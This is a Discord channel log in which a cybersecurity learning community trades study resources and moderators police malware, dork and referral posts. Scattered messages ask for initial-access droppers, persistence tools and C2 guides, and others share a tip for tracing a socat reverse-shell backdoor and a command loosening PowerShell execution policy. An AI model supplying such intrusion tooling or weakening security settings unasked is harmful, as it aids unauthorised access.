#resources

1 messages ยท Page 2 of 1

hexed sable
#

Hi, anyone got a nice example of a customer facing business continuity plan?

feral anvil
#

Does anyone know of a good online CompTIA A+ course?

flat falcon
#

The official one maybe? Haven't done it

simple juniper
odd sinewBOT
#

Gave +1 Rep to @simple juniper

nova loom
jagged tiger
#

We don't help with schoolwork.

cobalt canyon
#
SEKTOR7 Institute

Chief Research Officer at SEKTOR7. In the industry for over 20 years. Worked in global Red Team for almost a decade. Simulated threat actors targeting IT infrastructure across various industries (financial, technology, industrial, energy, aviation) around the world. Speaker at HackCon, PWNing, WTH@ck, Sec-T, T2, DeepSec. Gave guest lectures at s...

woeful pelican
#

What book would you recommend to get started in cybersecurity and hacking?

shut ferry
sonic abyss
#

awesome site

tawny dome
shut ferry
elder parrot
heavy ember
latent kelp
daring blade
#

Any CEH study groups ?? Pls reach me @daring blade

trail lodge
#

Hey folks! I am starting something new: https://github.com/DMaroo/GhidRust. I'd love if people could suggest new features, contribute to it (that'd be really awesome, thanks) and test it (once it matures).

GhidRust is a WIP Rust decompilation plugin for Ghidra, which dreams to be the one and only stop for any sort Rust binary analysis required inside Ghidra. As of now, it can detect Rust binaries, apply std library's function signatures and do very basic decompilation (still buggy).

slender oriole
trail lodge
hoary charm
#

do we have latest discount voucher for thm premium subscription?

stuck abyss
trail lodge
shut ferry
#

I wanna learn go lowkehv

junior hearth
#

Can someone recommend me some resources about c2 server + deployment and things about it?

odd quest
junior hearth
odd quest
#

They have access requirements

cold tapir
#

like is there numerous advanced channels or is it just level 13 or certs?

stuck abyss
cold tapir
#

Ty

leaden urchin
odd quest
glossy stratus
#

Hey guys, I've been thinking about migrating the Host OS of my laptop from Windows to Linux and am looking for good resources/guides on the best method for doing this. Any recommendations?

stuck abyss
glossy stratus
#

@stuck abyssYes, I've used DistroChooser to narrow down some options. It suggested Devuan, Rocky, and Debian. I've also been interested in Arch

stuck abyss
#

Arch is one I don't touch because I've always broken it.

#

Debian could be a good start.

#

I've only tried Mint, Ubuntu and Kali (I don't daily drive kali. and won't suggest you do it either)

glossy stratus
#

I've run Mint before in the past on a VM. It was okay, however I didn't really like the UI. I probably will go with Debian.

jagged tiger
#

if you want a linux desktop or daily driver, i'd recommend something stable-ish, but not necessarily as stable as centos or rocky. if you want to set up some enterprise-like boxes, LTS is the way to go.

glossy stratus
#

@jagged tiger It'd be for the purposes of having a linux desktop. Using my laptop is uncommon, but I'd like to have a dedicated device with linux as the host OS to experiment with. My primary desktop is Windows

#

And while I could continue using a VM on my primary desktop, I want the experience of using linux on metal. I believe VM's don't offer the same feeling

jagged tiger
# glossy stratus <@447041536807403545> It'd be for the purposes of having a linux desktop. Using ...

I would recommend Ubuntu or Fedora - if you want newer features, the 6-month release of Ubuntu is fine. If you intend to use it for schoolwork or actual work, you may want something more stable. Like Centos or Ubuntu LTS. You could go down the route of a less common distro as well, but part of the reason the RHEL upstreams and Ubuntu are popular is because there are pretty large and knowledgeable communities available for help

glossy stratus
jagged tiger
#

Don't nuke the factory recovery partition

#

And 'reverting to your old windows' won't really be possible, as you're either rewriting the partition table or you are over-writing the original windows partition.

#

If anything, I would recommend you get a recovery ISO and key from the desktop maker.

glossy stratus
#

Thank you for your advice, I appreciate it. Can you point me in a direction where I can learn a little bit more about how to format my drive and where to go after that?

jagged tiger
leaden urchin
odd sinewBOT
#

Gave +1 Rep to @odd quest

nova loom
honest nebula
#

Anyone knows a good resource of utilizing sleep based sql injection?

sharp wyvern
sonic nimbus
#
shut ferry
#

Hello everyone;
A program to change ip address with tor written in python2.7 2 years ago. I have rewritten it for python3.x versions under the name of PrivacyNet and shared it on my github address. You can access the vehicle from the link below.
https://github.com/HalilDeniz/PrivacyNet

GitHub

Contribute to HalilDeniz/PrivacyNet development by creating an account on GitHub.

prisma bison
#

@still lark Please ask before posting content on malware

still lark
#

Can I post it here ? , I am giving awareness about Malware

prisma bison
#

Malware discussion is restricted to the advanced channels #start-here

still lark
#

OK , Thank You ๐Ÿ™‚

undone belfry
sonic abyss
#

hashes.org doesn't exist

flat falcon
#

@barren vault

#

I think this message is not allowed in normal chats

coral loom
#

@odd quest

heavy elmBOT
#

:hammer: -ห‹ห เผป๏ผฏ๏ฝŽ๏ฝ™๏ฝ˜เผบ หŽหŠ-#8899 has been banned.

barren vault
#

Sorry was 4am for me when I was tagged & sleeping.

graceful idol
#

I'm New in TryHackMe,can
Anybody elaborate the streek freeze?

stuck abyss
warm vessel
#

Hi, I'm going to work on threat intelligence. Can you suggest any interesting websites to me? such as where to begin...

shut ferry
#

๐Ÿ’€

#

hes just reverse image seraching

#

they have no osint knowledge

#

i have lucidsint

#

about 20x better than them stuff they used there

prisma bison
#

Who asked though?

shut ferry
prisma bison
#

Fr

shut ferry
#

im not very good at threat intel

#

i dont focus on threat intel much

proper lake
odd sinewBOT
#

Gave +1 Rep to @steep spruce

heavy elmBOT
#

:hammer: $ Lucid#8994 has been banned.

proper lake
#

Lol

#

What does just happen ?

prisma bison
#

They have a blackhat tool in their bio

proper lake
#

Oh I see

prisma bison
#

And I'm pretty sure I've banned them before for trying to doxx community members

proper lake
prisma bison
#

np

#

Is that a referral link?

fringe spire
#

Seems like it

#

@prisma bison ^

heavy elmBOT
#

@swift saddle has been warned.

prisma bison
odd sinewBOT
#

Gave +1 Rep to @fringe spire

jagged tiger
#

Please don't post huge walls of text. If you have a resource you found that's useful, please just post the source and not 30 pages of links.

sullen palm
#

I think that's just the beginner free path?

shut ferry
prisma bison
#

@zealous remnant Donโ€™t post google drive links here please

flat falcon
prisma bison
flat falcon
#

what might happen with a google drive link?

hard solar
#

it's due that some can share some bad link

jagged tiger
#

Is this a referral link or do you otherwise gain anything from it?

sonic abyss
#

@sturdy shell

heavy elmBOT
#

@sinful crag has been warned.

woeful mirage
vivid zealot
#

Is there somewhere that I can find a document with all of the steps in the cyber kill chain detailed with the different tools that can be used for each step? For example enum4linux and linpeas are different options for enumeration.

brave harbor
# vivid zealot Is there somewhere that I can find a document with all of the steps in the cyber...

I'm not sure if there is such a resource (aside from building your own), but the closest I can think of is this - https://www.amazon.com/RTFM-Red-Team-Field-Manual/dp/1075091837

odd sinewBOT
#

Gave +1 Rep to @brave harbor

vocal hamlet
#

Hey team, i was hoping someone could make a recommendation on a stage 0 dropper/shell manager to use. I am not looking for a C2 with a full suite for post-exploitation but more for initial access and persistance.

gentle shuttle
sullen light
#

Can someone please recommend some cyber books?

vocal hamlet
shut ferry
#

Hi, I'm looking for resource so I can be really sharp within networking pretty much everything I need to know for hacking and what not. Anyone has any resources I can use or direct me to a course/site?

shut ferry
# shut ferry Hi, I'm looking for resource so I can be really sharp within networking pretty m...

So networking or hacking? Studying networking is an entire field in itself. If you want to simply begin to become adept in the type of networking you generally need to know, in order to hack networks then THM's Network Services module is a good place to start. From there I would utilize someone on YouTube named professor Messer. If you're ever confused about a concept he can clear things right up

night moon
#

suggest me some practical books of Hacking or some resources plzz

nova current
grim crown
prisma bison
#

Various Linux tools

nova loom
#

Would network+ teach me what I need to know for networking or is there another resource that's better

#

I'm not taking the actual certificate just using it as a structured learning path

charred arch
inland oyster
#

It's easy as well as there are ton of free resources/courses online and on YouTube for Network+

remote wind
odd sinewBOT
#

Gave +1 Rep to @remote wind

sinful crag
#

Do anybody has ec council courseware for ECSS or CCT certification

spice garnet
lyric heron
shut ferry
#

Hi. I'm probably not asking in the proper channel, but does anyone have experience preparing VMs for upload to a tryhackme room? I'm creating a room for the capstone project and there just isn't much documentation on what they expect for an uploaded box...

sudden fern
#

!docs room-creation

fervent summitBOT
sudden fern
#

@shut ferry โฌ†๏ธ should be a good start

shut ferry
odd sinewBOT
#

Gave +1 Rep to @sudden fern

sudden fern
shut ferry
#

Man why isn't this more prominently displayed with the development tab in thm? This is great thank you ๐Ÿ™

shut ferry
#

Does anybody know what happened to the "my machine" page where you could deploy a Kali box not attached to a room?

shut ferry
#

Hello @sudden fern? Can I ask another question real quick ?

vagrant lion
odd quest
sudden fern
odd sinewBOT
#

Gave +1 Rep to @sudden fern

shut ferry
prisma bison
#

@zinc silo Hey, discussion of Google Dorks is okay within reason but please refrain from posting dorks to find vulnerable websites here ๐Ÿ™‚

outer geode
#

Hey guys, quick question for anyone that might have some advice. If I just started and want to get a book or two to read, which ones would you recommend? I have a basic understanding of programming from my electrical engineering curriculum, but thats about it

sudden fern
#

why this book specifically??? it is extremely good at teaching how to write and provide good learning content meaning it can teach you how to show your progress and methods in an easy to understand matter

#

and a bonus is you will learn a skill most hackers don't have

outer geode
#

maybe one related more to cybersecurity?๐Ÿ˜‚ @sudden fern

sudden fern
#

well report writing and getting points across is important in all of cyber security but sure
Black Hat Ruby: Offensive Ruby programming for Hackers and Pentesters

outer geode
#

thanks!

shut ferry
#

https://youtu.be/KPd-ct3Fkg0
If anybody is interested in automating your google dorking and making your own search engine https://programmablesearchengine.google.com/about/

I want to start off by saying apologies for my horrible speech lol but in this video I teach you how to make your own engine using googles programmable search engine to automate your social media searches and hashtag searches.

โ–ถ Play video
Programmable Search Engine by Google

Help people find what they need on your website. Add a customizable search box to your web pages and show fast, relevant results powered by Google.

remote ore
#

๐Ÿ’€ ๐Ÿฅฒ

shut ferry
#

Anyone has any good free courses or resource for learning the basic of computer components. Like (CPU,RAM) and everything else. Also is it recommended to learn more about computer architecture when learning more about hardware?

night ether
#

the comptia a+ probably covers most everything you need to know at a basic level

nova loom
#

+1 for professor messor

sonic abyss
elder parrot
lone kraken
#

Hi, I want to join THM site and has come to my attention there are 20% off referrals codes. Anyone can help me out with that? blobheart

sonic abyss
#

I'm not aware of any referral codes? Just the 20% student discount?

violet cove
#

this might be better asked here: hey all Im looking for studying tips. Im going thru all the "easy" courses to get caught up on the basics. Do you write things down w/pen&paper while you go thru the material? are you typing it out in a note taking app (app?)? or do you just blast thru the, like I am lol? thanx

simple juniper
hard solar
inner heron
#

I've not been taking notes at all until very recently and it's definitely helping. I also am forming a cheat sheet of sorts with a bunch of basic commands for various software we use

vapid root
# violet cove this might be better asked here: hey all Im looking for studying tips. Im goin...

Blasting through without taking notes is a bad idea. The amount of knowledge to be learnt is infinite and you'll never memorize it all. Otherwise, you'll be wasting valuable time searching google when you encounter a challenge that you've done before but forgotten how to do. The better your notes are the more efficient you'll become at hacking. I would recommend noting in a digital format which makes searching faster and it's easier to reorganize everything as sections grow and warrant sub-headings. I originally started taking notes on my phone with One Note and I'm now converting all my notes into Obsidian because the amount of notes grew to such a stage I noticed it was slowing me down while trying to find things in One Note. After discovering Obsidian, I really regret not having migrated to it sooner.

prisma bison
#

@latent kelp Thatโ€™s not a resource?

violet cove
#

@simple juniper thank you!

odd sinewBOT
#

Gave +1 Rep to @simple juniper

violet cove
#

@hard solar thank you

#

@vapid root thank you much!

#

Great advice everyone. Ive begun taking notes on my studies using office word. Using the first three headings options seems to organize everything pretty well for now. Definitely going to check out obsidian today. Again, thank you everyone

warm pawn
shut ferry
#

looking a resource's for bug hunting and computer science & web hacking for a bug hunting

flat falcon
shut ferry
odd sinewBOT
#

Gave +1 Rep to @flat falcon

dawn oak
#

I got a virtual machine with web server configured. I need to find vulnerabilities in it and report it.
So i am looking for some resources to write a report for that since I don't have experience writing reports.
Thanks in advance

surreal canyon
#

Hi! I've recently upload this post about a homelab to study the eCPPTv2 certification. Because I don't know in which channel upload it, I am going to send it here. Hope you ejoy!

meager halo
#

kk

spiral bear
#

hai

sonic abyss
tepid patio
#

yo, the shodan room is fixed and so is my blogpost ๐Ÿ˜„ (the images pointed to a broken URL. Fixed them ๐Ÿ™‚ )

https://skerritt.blog/shodan/
https://tryhackme.com/room/shodan

Skerritt.blog

Shodan.io is a search engine for the Internet of Things.

Ever wondered how you can find publicly accessible CCTV cameras? What about finding out how many Pi-Holes are publicly accessible?

Or whether your office coffee machine is on the internet?

Shodan.io is the answer!

Shodan scans the whole

surreal sapphire
#

Does anyone have any good resources for learning Python a little better? Preferably free, or low cost. I would like something that starts with the basics and has exercises where I can actually test my knowledge. I downloaded a couple of apps but they're like Duolingo of Python and are too easy...not enough ways to actually apply the learning, only very very easy multiple choice questions. Thank you!!

sonic abyss
odd quest
odd sinewBOT
#

Gave +1 Rep to @sonic abyss

sonic abyss
stuck abyss
#

@brazen sequoia

brazen sequoia
#

@pale gull Please don't make posts like that here ๐Ÿ™‚

gloomy vapor
#

Does anyone know any good resources for Rust coding and security standards.

prisma bison
#

@finite patio Please post the course link, not a link to YouTube on how to claim the course ๐Ÿ™‚

untold nebula
#

A lot of mindmaps to help you navigate the cybersecurity universe:

https://github.com/Ignitetechnologies/Mindmap/tree/main

Also hereโ€™s a bunch of networking cheat sheets:

https://packetlife.net/library/cheat-sheets/

GitHub

This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - GitHub - Ignitetechnolo...

surreal sapphire
odd sinewBOT
#

Gave +1 Rep to @untold nebula

static veldt
spice garnet
#

Would individuals appreciate a list of play books for all the common services/basic enumeration? Maybe with some automatic scripts to help enumerate

flat falcon
balmy coral
tepid patio
#

hihi if you are looking at making an open source project I updated my article on my tips for it. i follow this formula myself and its worked for me, hope someone else finds it good

tl;dr - your readme / design is a lot more important than most people think ๐Ÿ˜„

https://skerritt.blog/make-popular-open-source-projects/

Skerritt.blog

Fancy watching this as a video instead? Click below:

Introduction

I have around ~10k GitHub stars. Iโ€™ve come up with a bullet-pointed actionable list of how to make open-source projects popular.

One of the projects I created had 67 lines of code and had only existed for 3 days

sonic abyss
#

From the university of Bristol in association with NCSC

sonic abyss
tepid patio
#

Request for resources: Setting up an Nvidia GPU on a Linux server with no GUI for CUDA support (even more so for the GTX 2060) with PyTorch

I have followed quite a few guides and they either assume I have a GUI so I can click through an app, or it's not quite right ๐Ÿ˜ฆ

jagged tiger
odd quest
#

I managed cuda headless without too many problems but not pytorch
Is this your home environment? Happy to help in DMs etc

odd quest
tepid patio
#
ssh autumn@XXXXX
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Now I can't SSH in for some reason what a fun time kekw

#

I love homelabs because you try to do something and everything breaks and its just a case of doing my job outside of my job to fix everything

odd quest
tepid patio
jagged tiger
odd quest
#

I don't have the dev dependencies

#

Just runtime

jagged tiger
#

Hmm

odd quest
#

Like a 2-3gb download still though?

jagged tiger
#

yeah, the CUDA libs themselves are pretty huge

tepid patio
shell sinew
#

What is the name of the site that has an archive of exploits?

shell sinew
#

lmfao if this is the one I am referring to I am so sorry for asking lol

#

I can't check rn cause my work firewall has it blocked. but in my defense it was a couple years since I last needed it hhaha

autumn kestrel
#

there's vulners too

cyan lagoon
#

hello. I am looking for Web Application CTFs styles of challenges whereby I can practice techniques such as XSS, CSRF and SSRF etc.

#

I've done the burp modules, tough I find them too theoretical. I've also completed the pwnCollege module which we're more my kind of thing.

#

best regards.

flat falcon
acoustic ledge
#

does anyone know free iOS emulator for windows?

jagged tiger
#

As this tool has a lot of unethical potential uses that are very low hanging fruit, I would ask that you not advertise it here.

simple juniper
nova loom
simple juniper
#

I don't know how they make money but it saves login time to make some quick queries.

odd quest
hollow depot
#

I don't think this is really fitting content for this channel ๐Ÿ˜‰

odd quest
#

Works on my machine

#

Eh, discord bug

#

That's the image below that I posted that's spinning

odd quest
stuck abyss
#

Ctrl and R might fix it.

#

Take alot of screenshot on Windows, and want the time stamp to feature on the command prompt or powershell?

###create a powershell profile, if it doesnt exist already
New-Item $Profile -ItemType file โ€“Force
##open it in notepad to edit
function prompt{ "[$(Get-Date)]" +" | PS "+ "$(Get-Location) > "}
##risky move, need to tighten this up. Change your execution policy or it won't
#run the profile ps1
#run as powershell admin
Set-ExecutionPolicy RemoteSigned
#

Command prompt

setx prompt $D$S$T$H$H$H$S$B$S$P$_--$g
remote ore
#

is it ok to learn from teh book which has reputation but its from 2008 -2012

#

i don't think fundamental change that much over time, whats is the advice ?

surreal sapphire
inland oyster
surreal sapphire
#

Anyone that is a FL resident and over 18 and just getting started trying to get into the field might be interested in this: https://cyberskills2work.org/i/pathway/10121/detail (full disclosure, I just saw this on LI and thought I would pass it on, I know nothing else about the program except it's free and you should be able to do CYSA+ at the end)

grizzled ore
shut ferry
#

This is a cool Homer's odyssey story inspired CTF

#

starts in 5 days

keen field
#
sonic abyss
sonic abyss
#
sonic abyss
#

I totally agree

static veldt
polar oasis
wooden vortex
#

guys, can you recommend some infosec news sources like newsletters, blogs etc. to be somewhat up to date?

sudden fern
#

all of these have rss feeds too

wooden vortex
odd sinewBOT
#

Gave +1 Rep to @sudden fern

sudden fern
#

no problem

#

generally some more general stuff news sources post about things like this too

#

like bleeping computer and ars technica

balmy coral
#

I've noticed for a lot of beginners they tend to not know any starting point on how to take notes, hence why i publicised a public repo of my redacted obsidian vault, which can be customized to your needs. Hope it helps new beginners on getting straight away started on taking notes while learning:
https://github.com/0xSoundOfSilence/LYT-Kit_Redacted

GitHub

Public repo of my vault. Contribute to 0xSoundOfSilence/LYT-Kit_Redacted development by creating an account on GitHub.

small night
#

heh it's your opinion I guess
the creator of the room is also the creator of haiti
personally I find haiti better. everyone uses whatever they want at the end of the day

sudden wing
#

๐Ÿ’œ

shut ferry
#

map of top 5000 sites and services, by favicon with the biggest favicons being the most popular

idle robin
stark urchin
#

Does anyone know how I can set up a vulnerable server just like the one THM is using in the Burp Suite Room? I want to practice more penetration testing stuff on it. ๐Ÿ™‚ Thanks

sullen totem
#

Either a bank or crypto vulnhub VM at least for me

#

I can build the web app if necessary just donโ€™t know how to make a vulnhub server

sacred pasture
#

hello people will you have the name of a blog which is represented as this site (exactly the same) but in English? it's a known blog but I can't find his name lmao. It bundles all the good cyber security resources for information

idle robin
pine vortex
rugged forum
#

Is there a site where I can stay up to date about everything in pentesting ? Also about how AI is being used in cyberโ€ฆi assume there are alot of AI tools that make life easy for pentesters, SOC analysts etc

jolly apex
sonic abyss
#

I think this has been posted before but,
https://www.phind.com/
Basically free access to GPT4 + Tells you the sources + Can change website rankings - I've found it really helpful so thought it'd be worth posting

spring coral
tribal oyster
#

hi guys... does anyone have resources for learning tcpdump and Wireshark?

stuck abyss
tribal oyster
odd sinewBOT
#

Gave +1 Rep to @stuck abyss

sonic abyss
#

https://youtu.be/EHp4FPyajKQ
Finally made it click watching this

Get a free audiobook and a 30-day trial of Audible (and support this channel) at http://www.audible.com/upandatom or text "upandatom" to 500 500 on your phone.

Hi! I'm Jade. If you'd like to consider supporting Up and Atom, head over to my Patreon page :)
https://www.patreon.com/upandatom

Subscribe to Up and Atom for physics, math and comput...

โ–ถ Play video
odd sinewBOT
#

Gave +1 Rep to @mystic siren

torpid gate
#

Hey guys , i'm going to do a telecommunications networks license at university and I want to take a little advance, are there any introductory courses to advise me?

distant wave
idle robin
shut ferry
prisma bison
idle robin
sonic abyss
shut ferry
stuck abyss
#

Private rooms can't be access...

#

Also, I seen this on your blog.

idle robin
sonic abyss
#

I don't understand the fuss behind TLDs like these, they are the exact same as any other one (like .tech or .com or .org)

#

Would you mind explaining your reasoning behind it? I'm just generally curious if I'm missing something

#

You realize that the domain name has nothing to do with downloading things?

#

sure

idle robin
#

? Lol

#

and only you don't go coolguy

idle robin
#

well, there's nothing you can do about it if you don't have knowledge about how domains really work. We post papers with incredible subjects and techniques, it's up to the reader if he wants to or not. coolguy blobfingerguns

idle robin
#

@unique crown you deleted all messages lol ๐Ÿคฃ

inner light
#

Found this awesome description of the RSA Algo
https://www.youtube.com/watch?v=Pq8gNbvfaoM

In this we discuss RSA and the RSA algorithm. We walk our way through a math example of generating RSA keys, and then proving the ability to encrypt a message with one key and decrypt with the other (in both directions).

We show you how RSA uses prime numbers to create keys and encrypt/decrypt messages. And discuss how the Security of RSA lies ...

โ–ถ Play video
swift wedge
#

๐Ÿ” Hack Me, Test Me, Crack Me! ๐Ÿ’ป๐Ÿ”ฅ

๐Ÿ”Ž Seeking the eJPTv2 Certification ๐Ÿ†
Hey! Buy me a coffee โ˜• and support my quest to conquer the eLearnSecurity Junior Penetration Tester v2 (eJPTv2) certification. Your contribution will help me unlock the skills to safeguard digital fortresses! ๐Ÿ›ก๏ธ๐Ÿ’ช

[!]๐Ÿ”— Grab a Coffee & Show Some Love: https://www.buymeacoffee....

โ–ถ Play video
idle robin
broken scarab
honest nebula
#

Hey,
I have a Windows application that I need to reverse engineer and identify vulnerabilities within.
I've opened the folder with dotpeek and there are lots of dlls and I need some direction what to look for.
I'm looking for some tips or a link to a good source to learn from.
Thanks.

#

This is a top level view of the dlls:

sonic abyss
sly cedar
brazen sequoia
#

@graceful hawk Code seems to not work, and we don't really want to advertise paid content in here ๐Ÿ™‚

south crater
#

One question.

As a hacker is it better to know how "raw coded" things work, or use libraries that makes it easier. Say a hacker will use web socket to make something in realtime, will he use a library for that or just use a protocol/built in modules to do the job(Maybe the worst example).

sonic abyss
#

Understand how it works at the lower level, then use a library to quickly get it done

sonic abyss
#

https://youtube.com/watch?v=q3-xCvzBjGs
cool video for slow people like me

Learn JavaScript ๐Ÿ‘‰https://learnjavascript.online/?utm_source=specex
React Tutorial ๐Ÿ‘‰https://react-tutorial.app/?utm_source=specex
Learn Programming ๐Ÿ‘‰ https://learnprogramming.online/?utm_source=specex
Learn HTML CSS ๐Ÿ‘‰ https://learnhtmlcss.online/?utm_source=specex

Find out how a typical Spectre attack works in this video that simplifies the cod...

โ–ถ Play video
nova loom
dark tinsel
near scroll
#

Hello. I'm looking for a resource I can keep on my attacker VM that is a folder including all or most exploits/scanners that are transferred to windows targets and AD environments. I can make my own but I bet someone already made a git for it somewhere and includes things I don't know about.

Please @ me if you respond to this

simple juniper
shut ferry
simple juniper
#

It's a new addition to the course

unique crown
idle robin
#

this is my new cve

vale goblet
#

im currently doing the soc level 1 path. are there any good books to read about that topic?

karmic wave
#

Hi , any resource to walkthrough Android Hacking 101?

inland oyster
vale goblet
#

not really im too new to the field

#

but i search a bit on amazon and i think i found some interesting books

plush sequoia
#

how do you convert a jar or dex file to apk

I have searched a lot online, tried dex2jar, apktool to no success

it was straightforward converting apk to jar but the recompilation seems different

unique crown
#

sounds like a pickle, oops i mean onion

unique crown
wispy stag
#

The Simple CTF room is outdated because of the exploit was written 5 years ago, here is a little help how to solve/workaround the issue: http://tomsitcafe.com/2023/08/23/tryhackme-simple-ctf-modern-solution-2023-working-exploit-with-docker-io/

If you have been doing the TryHackMe Simple CTF challenge recently, you may have ran into the problem that the original exploit is written in Python 2 for Ubuntu 18.04. The script can be converted โ€ฆ

#

this way you don't need to rewrite/convert the exploit, and the console output will be usable

sudden fern
#

pyenv and virtualenv anyone???

#

yes your way will obviously work but using the tools intended for using any version of python with a specific script and its dependencies goes a long way

sonic abyss
sudden fern
sonic abyss
#

oh I use it directlyEZ

karmic wave
#

Hi , any resource to walkthrough Android Hacking 101 in tryhack me room? Like you tube video walkthrough?

prisma bison
#

@graceful hawk Please don't post shortened links here

graceful hawk
unique crown
craggy onyx
#

Please interact with the community before advertising your udemy courses.

south stag
#

Hi hackers, do someone have some really good indepth wapt resourse ?

simple juniper
south stag
#

Yes I have

#

I just wanted to get some good videos

runic shuttle
#

Hi guys, I may be interviewing some blockchain/crypto companies for a security roles in the near future. Is there any interview questions cheat sheets/tutorials/free online courses on cybersecurity related to blockchain/crypto?

paper ingot
#

Just dropped a brand-new video where I take you through the essentials of Server-Side Request Forgery (SSRF), demonstrate how ChatGPT can generate SSRF-vulnerable code, and share effective mitigation techniques! ๐Ÿš€

https://youtu.be/_NSmeqeS7Go?feature=shared

sonic abyss
#
Putting the "You" in CPU

Curious exactly what happens when you run a program on your computer? Learn how multiprocessing works, what system calls really are, how computers manage memory with hardware interrupts, and how Linux loads executables.

unique crown
#

this is fresh, july

idle robin
sonic abyss
#

maths LaTeX cheatsheet

unique crown
#

Port Swigger is a great resource, I like how they break the concept down and give you lots of labs

spring coral
prisma bison
#

@rough void Can you interact with the community before posting your tools here, please?

unique crown
unique crown
#

I bought Hacking API book and now there is a video ! (also there is the API academy)

https://youtu.be/YYe0FdfdgDU?feature=shared

Learn about the OWASP API Security Top 10, 2023 edition. In this crash course, you will learn about each security risk and learn techniques to fortify your APIs against potential threats. The course also covers key concepts that didnโ€™t make it into the Top 10.

โœ๏ธ Course created by APIsec University and Corey Ball
Website: https://www.apisecuniv...

โ–ถ Play video
unique crown
craggy onyx
odd sinewBOT
#

Gave +1 Rep to @craggy onyx

odd sinewBOT
#

Gave +1 Rep to @craggy onyx

unique crown
#

This information is from Cisco's YouTube channel video: The Essentials of CCST Certification

# CCST Cybersecurity

validates's skills and knowledge of:

- cybersecurity principles
- network security and endpoint security concepts
- vulnerability assessment & risk management
- incident handling
- 1st step towards CyberOps Associate certification
- CCST certification for life
- no recertification requirements

Cisco Certified Support Technician: Cybersecurity  (there is Networking too)

- cybersecurity technician
- jr cybersecurity analyst
- help desk support
- security operations analyst



## CCST Training

CCST Networking (free e-learning & prep exam)

- network basics
- networking devices and initial config
- network addressing & basic troubleshooting
- network support & security
- network tech career path exam


CCST Cybersecurity (free training)

- intro to cybersecurity
- networking basics
- networking devices and initial config
- endpoint security
- network defense
- cyber threat management

120 hrs to complete
then exam

skillsforall.com > Explore > Get certified > CCST

https://skillsforall.com/resources/ccst-cybersecurity?courseLang=en-US

https://skillsforall.com/career-path/cybersecurity?courseLang=en-US



### Exam

CCST have to use, config diagnose problems, deeper concepts

CCST exam $125 USD, online requires proctor & webcam

50 min exam, must pass exam for cert

CCST Networking exam Topics :

1. standards and concepts
2. addressing and subnet formats
3. endpoint and media types
4. infrastructure
5. diagnosing problems
6. security (subdomains, WiFi, firewalls)
#

for the Network packet module you need to download Cisco's network software to analyze packets and answer questions

#
CCST Cybersecurity exam Topics:

1. essential security principles
2. basic network security changes
3. endpoint security concepts
4. vulnerability assessment and risk management
5. incident handling
unique crown
golden nova
#

https://roadmap.sh/roadmaps

Very useful website learn cybersecurity or any other computer related field very easy with step by step guys enjoy accessgranted

roadmap.sh

Step by step guides and paths to learn different tools or technologies

unique crown
wooden vortex
#

hey, do you guys know of a resource about thc-hydra? I cannot find anything that lists modules, specific options for modules etc

odd quest
winter hound
unique crown
dawn oak
#

Any web security labs other than portswigger to practice?

unique crown
dawn oak
#

it is more like retro htb

#

boxes to solve

hushed estuary
unique crown
#

seriously why do i even bother to answer people. today onwards i am not going to help.

#

muted channel

dawn oak
#

TF what happened?

hushed estuary
spice garnet
hushed estuary
fierce meteor
#

Hey, noob here. Does anyone know any good resources about the process of recon/ how an experienced ethical hacker would go about recon?

heavy ember
fierce meteor
#

Ah thanks!

wicked knoll
#

Hello guys, I'm preparing for CEH exam and so far it's not that good as I am reading the book the EC council have provided. I need any video content about CEH to prepare for it. So if possible please provide me with resources! Thank You

heavy ember
wicked knoll
#

It covers all the 20 modules required for exam

hushed estuary
odd sinewBOT
#

Gave +1 Rep to @hushed estuary

quiet rock
#

Free Event โ€“ worth checking out. Most interested in the talk on cloud lateral movement & hearing about the next gen of cloud attacks! Also, lots of info on new research & tools to level up your offensive sec game. And personally, donโ€™t know who'd pass up a session with Stephen Sims.

HackFest Summit 2023
November 16-17 | Free Live Online
Details here: https://www.sans.org/u/1qTn

honest nebula
#

I'm looking to practice exploiting viewstate deserialization vulnerability.
anyone knows a machine wether it's on tryhackme or others?
or maybe setting up a new virtual machine that will have it?

vivid locust
vivid locust
plain wagon
golden nova
velvet fiber
#

Hello all! I'm looking for good ways to learn cybersecurity and stay up to date on news in the field on my phone. Are there any good android apps that you all would recommend as far as learning, or cyber news? Thank you!

fallen hull
#

Has anyone got any good links for phone number lookups?

fringe spire
timid light
inland oyster
karmic shore
swift wedge
#

I created this Anki deck for my own study purposes. It's a compilation of basic questions and topics that I found useful maybe for interview preparation and general knowledge enhancement.
You can download it from the AnkiWeb page at https://ankiweb.net/shared/info/2114580232?cb=1694109492290 or from my GitHub repository at https://github.com/kevinalexandervanegaszubiria/Basic-Cybersecurity-Interview-Questions-Anki-Deck

GitHub

This deck contains a series of basic questions commonly asked during cybersecurity interviews. It covers topics such as information security, penetration testing, encryption types, vulnerability as...

heavy ember
shut ferry
untold nebula
#

https://www.softwaretestinghelp.com/ not sure if its been posted before but there are some nice tutorials here.

Software Testing Help

Most popular portal for Software professionals! You will absolutely love our tutorials on Software Testing, Development, Software Reviews and much more!

shut ferry
shut ferry
#

To launch a Reverse shell, the attacker doesnโ€™t need to know the IP address of the victim to access the target computer.

sonic abyss
#

what about it?

#

victims machine connects to attackers machine

pastel ravine
#

Is it possible to get the actual VM used in any of the rooms .... Say like the owasp top 10 room

dense citrus
#

When investigating a suspicious process on Linux, try this:

strings /proc/<PID>/environ

For example, a socat command was used to spawn a reverse bindshell backdoor. Environ entry shows SSH connection data and traces to the socat comand. Some versions of netcat do similar.

stuck abyss
#

^ That's true.

There is some that are on Vulnhub,

I have a few of the older ones, like Blue, Retro! ETC.

But if it's THM's own they don't.

sonic abyss
#

@pastel ravine Now you asked about OWASP Top 10, the Juicebox one is avaliable https://owasp.org/www-project-juice-shop/

dull glade
#

hey ! every one
i have just recently got my CEH masters and ejpt certs . now to explore more about the field of malware analysis and detection. so i have decided to work on an open source anti malware (also as my final year project ) . I have read few research papers and patents for this , i will be very grateful if you guys can provide me with some resource or provide me some direction or things to consider or someone else project like this . i want to make sure that anti malware should be fairly easy to setup but offers customization for advanced users also most of the detection should be done on the host itself and not by sending a sample to cloud server. thanks in advance

sonic abyss
#

@prisma bison

swift wedge
#

